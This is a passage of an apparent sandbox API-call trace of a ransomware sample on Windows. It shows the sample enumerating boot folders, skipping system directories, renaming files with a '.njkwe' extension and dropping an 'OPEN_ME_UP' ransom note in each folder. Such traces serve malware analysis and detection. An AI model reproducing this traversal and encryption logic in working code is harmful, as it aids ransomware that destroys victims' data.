lpNewFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT_r00t_{3sXlE5}.njkwe" (normalized: "c:\\boot\\bootstat.dat_r00t_{3sxle5}.njkwe")) returned 1 [0064.981] GetProcessHeap () returned 0xbe0000 [0064.981] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0064.981] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef4fcd12, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x185a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootvhd.dll", cAlternateFileName="")) returned 1 [0064.981] lstrcmpiW (lpString1="bootvhd.dll", lpString2="Windows") returned -1 [0064.981] lstrcmpiW (lpString1="bootvhd.dll", lpString2="$Recycle.bin") returned 1 [0064.981] lstrcmpiW (lpString1="bootvhd.dll", lpString2="System Volume Information") returned -1 [0064.981] lstrcmpiW (lpString1="bootvhd.dll", lpString2="Program Files") returned -1 [0064.981] lstrcmpiW (lpString1="bootvhd.dll", lpString2="Program Files (x86)") returned -1 [0064.982] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\bootvhd.dll") returned 23 [0064.982] StrStrIW (lpFirst="bootvhd.dll", lpSrch=".njkwe") returned 0x0 [0064.982] lstrcmpW (lpString1="bootvhd.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.982] lstrcmpW (lpString1="bootvhd.dll", lpString2="taridd") returned -1 [0064.982] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\bootvhd.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.982] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.983] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef511a4c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0064.983] lstrcmpiW (lpString1="cs-CZ", lpString2="Windows") returned -1 [0064.983] lstrcmpiW (lpString1="cs-CZ", lpString2="$Recycle.bin") returned 1 [0064.983] lstrcmpiW (lpString1="cs-CZ", lpString2="System Volume Information") returned -1 [0064.983] lstrcmpiW (lpString1="cs-CZ", lpString2="Program Files") returned -1 [0064.983] lstrcmpiW (lpString1="cs-CZ", lpString2="Program Files (x86)") returned -1 [0064.983] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ") returned 17 [0064.983] lstrcmpW (lpString1="cs-CZ", lpString2=".") returned 1 [0064.983] lstrcmpW (lpString1="cs-CZ", lpString2="..") returned 1 [0064.983] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\cs-CZ", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0064.983] GetProcessHeap () returned 0xbe0000 [0064.983] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0064.983] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\*") returned 19 [0064.983] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef511a4c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ce0 [0064.983] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0064.983] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0064.983] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0064.983] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0064.983] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0064.983] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\.") returned 19 [0064.983] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0064.984] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef511a4c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0064.984] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0064.984] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0064.984] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0064.984] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0064.984] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0064.984] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\..") returned 20 [0064.984] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0064.984] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0064.984] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47e189c, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2109581d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b58, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0064.984] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0064.984] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0064.984] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0064.984] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0064.984] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0064.984] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 33 [0064.984] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0064.984] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.984] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0064.984] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.984] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.984] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f1d4cf, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0064.984] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0064.984] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0064.984] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0064.984] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0064.984] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0064.984] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 33 [0064.984] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".njkwe") returned 0x0 [0064.984] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.985] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0064.985] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\cs-CZ\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.985] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\memtest.exe.mui" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.985] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f1d4cf, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0064.985] FindClose (in: hFindFile=0xc19ce0 | out: hFindFile=0xc19ce0) returned 1 [0064.985] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0064.985] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\cs-cz\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0064.987] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0064.988] CloseHandle (hObject=0x428) returned 1 [0064.988] GetProcessHeap () returned 0xbe0000 [0064.988] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0064.988] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="da-DK", cAlternateFileName="")) returned 1 [0064.988] lstrcmpiW (lpString1="da-DK", lpString2="Windows") returned -1 [0064.988] lstrcmpiW (lpString1="da-DK", lpString2="$Recycle.bin") returned 1 [0064.988] lstrcmpiW (lpString1="da-DK", lpString2="System Volume Information") returned -1 [0064.988] lstrcmpiW (lpString1="da-DK", lpString2="Program Files") returned -1 [0064.988] lstrcmpiW (lpString1="da-DK", lpString2="Program Files (x86)") returned -1 [0064.988] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK") returned 17 [0064.988] lstrcmpW (lpString1="da-DK", lpString2=".") returned 1 [0064.988] lstrcmpW (lpString1="da-DK", lpString2="..") returned 1 [0064.988] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\da-DK", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0064.988] GetProcessHeap () returned 0xbe0000 [0064.988] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0064.988] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\*") returned 19 [0064.988] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\da-DK\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ca0 [0064.989] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0064.989] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0064.989] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0064.989] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0064.989] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0064.989] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\.") returned 19 [0064.989] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0064.989] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0064.989] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0064.989] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0064.989] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0064.989] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0064.989] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0064.989] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\..") returned 20 [0064.989] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0064.989] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0064.990] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47e189c, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0064.990] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0064.990] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0064.990] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0064.990] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0064.990] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0064.990] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 33 [0064.990] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0064.990] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.990] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0064.990] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.990] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.990] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5252b3, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0064.990] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0064.990] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0064.990] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0064.990] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0064.990] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0064.990] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\memtest.exe.mui") returned 33 [0064.990] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".njkwe") returned 0x0 [0064.990] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.990] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0064.990] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\da-DK\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.990] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\memtest.exe.mui" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.990] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5252b3, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0064.990] FindClose (in: hFindFile=0xc19ca0 | out: hFindFile=0xc19ca0) returned 1 [0064.990] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0064.991] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\da-dk\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0064.992] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0064.993] CloseHandle (hObject=0x428) returned 1 [0064.993] GetProcessHeap () returned 0xbe0000 [0064.993] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0064.993] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="de-DE", cAlternateFileName="")) returned 1 [0064.993] lstrcmpiW (lpString1="de-DE", lpString2="Windows") returned -1 [0064.993] lstrcmpiW (lpString1="de-DE", lpString2="$Recycle.bin") returned 1 [0064.993] lstrcmpiW (lpString1="de-DE", lpString2="System Volume Information") returned -1 [0064.994] lstrcmpiW (lpString1="de-DE", lpString2="Program Files") returned -1 [0064.994] lstrcmpiW (lpString1="de-DE", lpString2="Program Files (x86)") returned -1 [0064.994] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE") returned 17 [0064.994] lstrcmpW (lpString1="de-DE", lpString2=".") returned 1 [0064.994] lstrcmpW (lpString1="de-DE", lpString2="..") returned 1 [0064.994] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\de-DE", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0064.994] GetProcessHeap () returned 0xbe0000 [0064.994] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0064.994] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\*") returned 19 [0064.994] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\de-DE\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19d20 [0064.994] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0064.994] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0064.994] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0064.994] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0064.994] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0064.994] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\.") returned 19 [0064.994] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0064.994] FindNextFileW (in: hFindFile=0xc19d20, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0064.994] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0064.994] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0064.994] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0064.994] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0064.994] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0064.994] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\..") returned 20 [0064.994] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0064.994] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0064.994] FindNextFileW (in: hFindFile=0xc19d20, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48079da, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0064.994] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0064.994] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0064.994] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0064.994] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0064.995] lstrcmpiW 